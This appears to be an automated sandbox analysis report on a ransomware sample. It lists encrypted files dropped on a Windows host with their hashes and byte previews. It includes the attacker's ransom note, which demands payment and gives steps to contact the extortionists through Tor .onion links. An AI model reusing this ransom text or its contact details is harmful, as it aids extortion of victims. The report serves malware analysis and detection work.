                                                                                                                                                      Preview: 9....RuW..6.GA~WR..E.L.S.-...&mt.WS...@..y$..CB~W.....)...3.u..ol..;[B1&wg...'H.ES...^.];V.0]..."...J.f...5.:7..'.^.}...z.h.`.}w8g.:.!...~.....T.)O......V.|.A>.)..KI...'.|w.`.....1a....*.n1......@/.k.7..%...p.....B7Y.TA.Do.......D9...Y.AFLD....,....z....=")Y.s....q...n#V.....Pn'W....c\..n....Y.L.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\Public\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.585586390583736
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:7Vl8R2ZzK8sevWAVgKTaCB7RZ0cHYIgtyUz8d6V:7Va4ZzCwgck38I
                                                                                                                                                      MD5:05925434824B1D0C4B5D196C7DF5314C
                                                                                                                                                      SHA1:52767C7BE2443D69349428CD23C7BD19B07E66B9
                                                                                                                                                      SHA-256:841612524B253FBDC8225751A5A25B6A8D1EBA0D5579C3FB14BFB137ADA96E20
                                                                                                                                                      SHA-512:3FA133D21A1E83429D40B42E50ABDBD25216552600907E6E3EE813154986D4A068004EBE1CE5CA32DA5A9C97BFD664DC9E465CD5DBC18A1754D3D87EAB8FFFC0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 9....RuW..6.GA~WR..E.L.S.-...&mt.WS...@..y$..CB~W.....)...3.u..ol..;[B1&wg...'H.ES...^.];V.0]..."...J.f...5.:7..'.^.}...z.h.`.}w8g.:.!...~.....T.)O......V.|.A>.)..KI...'.|w.`.....1a....*.n1......@/.k.7..%...p.....B7Y.TA.Do.......D9...Y.AFLD....,....z....=")Y.s....q...n#V.....Pn'W....c\..n....Y.L.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\Public\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.628596588184773
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:QjYjIlki1XgLf3z7zK8sevWAVgKTaCB7RZ0cHYIgtyUzY:QsjICiZwPXzCwgck38d
                                                                                                                                                      MD5:2FF4A7F8DC1F25628E2597CA8DCF237E
                                                                                                                                                      SHA1:AD92224723DBD05FC91A6E95F4B4BC16317C007E
                                                                                                                                                      SHA-256:8D80CF02127F0767BDC3BDFDB84B09F26FD2A4311FF8DDE6A1FF65935FFE68C9
                                                                                                                                                      SHA-512:5EF79ADBF45A2CF9264213EC529D88D4AEFCB3CFE3404E2CAB713C27DFFD196867F7D003D4CFF8A01D3138F650DFA6D133B54BC65EC45A5BC35908AFD934B1D9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 5.....z......-?..KB.4.]..iq8..r.^..........e. ...vg..Q.K&...C.c.(.|X.q.n)......c.ij.:I.].r?[K.U..F#..-.<.m&...^V...w...3.."...HE.....J.L....VM...,.&... $...wM.I.U.@..\&......u.#.P.b/$......X.9..3b..9..N.{..59:..<..@..r.nX.2..Y......%.(e...y*.F.1....W#.2.....".....x.y.%...N,d....A..t8..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.628596588184773
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:QjYjIlki1XgLf3z7zK8sevWAVgKTaCB7RZ0cHYIgtyUzY:QsjICiZwPXzCwgck38d
                                                                                                                                                      MD5:2FF4A7F8DC1F25628E2597CA8DCF237E
                                                                                                                                                      SHA1:AD92224723DBD05FC91A6E95F4B4BC16317C007E
                                                                                                                                                      SHA-256:8D80CF02127F0767BDC3BDFDB84B09F26FD2A4311FF8DDE6A1FF65935FFE68C9
                                                                                                                                                      SHA-512:5EF79ADBF45A2CF9264213EC529D88D4AEFCB3CFE3404E2CAB713C27DFFD196867F7D003D4CFF8A01D3138F650DFA6D133B54BC65EC45A5BC35908AFD934B1D9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 5.....z......-?..KB.4.]..iq8..r.^..........e. ...vg..Q.K&...C.c.(.|X.q.n)......c.ij.:I.].r?[K.U..F#..-.<.m&...^V...w...3.."...HE.....J.L....VM...,.&... $...wM.I.U.@..\&......u.#.P.b/$......X.9..3b..9..N.{..59:..<..@..r.nX.2..Y......%.(e...y*.F.1....W#.2.....".....x.y.%...N,d....A..t8..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):960
                                                                                                                                                      Entropy (8bit):4.9456825941425615
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:vWsNtbjxzK8sevWAVgKTaCB7RZ0cHYIgtyUzx8:vWkVjxzCwgck38s8
                                                                                                                                                      MD5:29CC20CA98EAE3A92ECEBBCEFEE9B6F1
                                                                                                                                                      SHA1:D0F628D7D35617A12E6481BD8E46FE800D37BDDA
                                                                                                                                                      SHA-256:8135EE444308826F7874FEA8F5AAD0D35CA2C8AE53CB6E30235A728499212FA1
                                                                                                                                                      SHA-512:A51FBF35775AB50B8F90E8C644A7235009B24814162E6EFFA2E231583888255D1546D60A8FCD141A4FA7DE588AB664B4EADAC6026235C6E077F816135BF8BAAD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...._=.....DJMn.Vn..P..;Bf..p.,.......0...%...[..&mb..i<<.9....A...N0.c$=..P...AN..C._.>F...7e5|0..S.)i....ta..[;.A.c.[GN....".......c\u..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74.N.....Z.S.hf..p...)....5.pd@.....!....QM&....L].
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):960
                                                                                                                                                      Entropy (8bit):4.9456825941425615
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:vWsNtbjxzK8sevWAVgKTaCB7RZ0cHYIgtyUzx8:vWkVjxzCwgck38s8
                                                                                                                                                      MD5:29CC20CA98EAE3A92ECEBBCEFEE9B6F1
                                                                                                                                                      SHA1:D0F628D7D35617A12E6481BD8E46FE800D37BDDA
                                                                                                                                                      SHA-256:8135EE444308826F7874FEA8F5AAD0D35CA2C8AE53CB6E30235A728499212FA1
                                                                                                                                                      SHA-512:A51FBF35775AB50B8F90E8C644A7235009B24814162E6EFFA2E231583888255D1546D60A8FCD141A4FA7DE588AB664B4EADAC6026235C6E077F816135BF8BAAD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...._=.....DJMn.Vn..P..;Bf..p.,.......0...%...[..&mb..i<<.9....A...N0.c$=..P...AN..C._.>F...7e5|0..S.)i....ta..[;.A.c.[GN....".......c\u..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74.N.....Z.S.hf..p...)....5.pd@.....!....QM&....L].
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.714266678177653
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:koc8I8JHgrOwVvhzK8sevWAVgKTaCB7RZ0cHYIgtyUzGu:A8JHShzCwgck38/u
                                                                                                                                                      MD5:EF941E4C761BD1E0B7EBA8FBA45DB3B6
                                                                                                                                                      SHA1:A465BA0F800A24F54F741B0B61A64AA159EA388F
                                                                                                                                                      SHA-256:D4F153D52ACAAE35E595CE9F2D45AAF7DDE6B5E9BAB2D06AD5786728158F0E84
                                                                                                                                                      SHA-512:9953E746E8E46EC39E30EC8FCBDD26DF977FBC70E4E219FC60617C6AEB1D183ABFB06D016301913D79732591E0A87918EFAFCA92EC528877800A4FD06F239B97
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....k...%1.\.18vz.2sS..k....I...y'-..Zck...>...$........M...FB. ..'lbNu.Q.8T.wC.......gU.. .7.....O:..&.RBr{.g.9'.G.........s..q7..w......1..M9....J.......WO0p,W.T..d!~.U...@&.X..e...Q..I5.....In3.4.3m..$..A..W.,.Y..fkR@....(.q.5a^.......6.o.Kf6.)Lg..k.`..K.7......1.........O....S..\...w...*.fj7Z.....RY....m.A......E..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.714266678177653
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:koc8I8JHgrOwVvhzK8sevWAVgKTaCB7RZ0cHYIgtyUzGu:A8JHShzCwgck38/u
                                                                                                                                                      MD5:EF941E4C761BD1E0B7EBA8FBA45DB3B6
                                                                                                                                                      SHA1:A465BA0F800A24F54F741B0B61A64AA159EA388F
                                                                                                                                                      SHA-256:D4F153D52ACAAE35E595CE9F2D45AAF7DDE6B5E9BAB2D06AD5786728158F0E84
                                                                                                                                                      SHA-512:9953E746E8E46EC39E30EC8FCBDD26DF977FBC70E4E219FC60617C6AEB1D183ABFB06D016301913D79732591E0A87918EFAFCA92EC528877800A4FD06F239B97
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....k...%1.\.18vz.2sS..k....I...y'-..Zck...>...$........M...FB. ..'lbNu.Q.8T.wC.......gU.. .7.....O:..&.RBr{.g.9'.G.........s..q7..w......1..M9....J.......WO0p,W.T..d!~.U...@&.X..e...Q..I5.....In3.4.3m..$..A..W.,.Y..fkR@....(.q.5a^.......6.o.Kf6.)Lg..k.`..K.7......1.........O....S..\...w...*.fj7Z.....RY....m.A......E..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.631562457332873
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:2sabIJzK8sevWAVgKTaCB7RZ0cHYIgtyUzFR:2V+zCwgck38a
                                                                                                                                                      MD5:505172BF8E6E2CECF7B5632B802B7E67
                                                                                                                                                      SHA1:B085AD32C021216FF56BFB1BAA12D9083F67E92F
                                                                                                                                                      SHA-256:032C3E143EA51E163D6E68EBCE0AE1C5694C19CFEB3BCEF3DFEDDD6B3DF4E758
                                                                                                                                                      SHA-512:5D1D5B847F8B426914504DD88051D8B6873B3E3D2EEBF3D0EB531717F5819EBE208997B263A7B0815297D1EC4CE218F7171A4EDCF2A7ECC3DA11285D544282B1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .......>.I2...dm.Q......s..CVd.W7w<M.\.ZF.n....1......<....6:..#.....<H.18.7..8G..+...3C>q...?Sv...-.H*...%eK..U.g..% .ND...4.?...y.E........p2.:.y.x...yV2E...x..R-%e.s.s....0..).N...............A..G.R....").....r..t.....qZ).a.%...X..|........l).........z...;...1.p.T.M.s..L..?s..Z..UR..p.=..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.631562457332873
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:2sabIJzK8sevWAVgKTaCB7RZ0cHYIgtyUzFR:2V+zCwgck38a
                                                                                                                                                      MD5:505172BF8E6E2CECF7B5632B802B7E67
                                                                                                                                                      SHA1:B085AD32C021216FF56BFB1BAA12D9083F67E92F
                                                                                                                                                      SHA-256:032C3E143EA51E163D6E68EBCE0AE1C5694C19CFEB3BCEF3DFEDDD6B3DF4E758
                                                                                                                                                      SHA-512:5D1D5B847F8B426914504DD88051D8B6873B3E3D2EEBF3D0EB531717F5819EBE208997B263A7B0815297D1EC4CE218F7171A4EDCF2A7ECC3DA11285D544282B1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .......>.I2...dm.Q......s..CVd.W7w<M.\.ZF.n....1......<....6:..#.....<H.18.7..8G..+...3C>q...?Sv...-.H*...%eK..U.g..% .ND...4.?...y.E........p2.:.y.x...yV2E...x..R-%e.s.s....0..).N...............A..G.R....").....r..t.....qZ).a.%...X..|........l).........z...;...1.p.T.M.s..L..?s..Z..UR..p.=..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1200
                                                                                                                                                      Entropy (8bit):5.866688545311257
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:XrJcAa85O+lrOczK8sevWAVgKTaCB7RZ0cHYIgtyUz3+:XrJBhO+zCwgck38b
                                                                                                                                                      MD5:FE5BECD7023AE0ABD6DC20A62ABF90CE
                                                                                                                                                      SHA1:50621273E1375A741E1DDCD2198063B343D733C0
                                                                                                                                                      SHA-256:8E94A772DE9B138FEDB13B3A34025A950DFA99E48DAAC1694AFC3E49C76DD16F
                                                                                                                                                      SHA-512:54B7BFD8B2ADA5693069D76010BDD06F0288F34C853E3FE00DD0E08CAA2E723271E496FB210E1B95DA624FB4D38FF1F693BAF26A4514F763408998626D84BD4D
                                                                                                                                                      Malicious:false
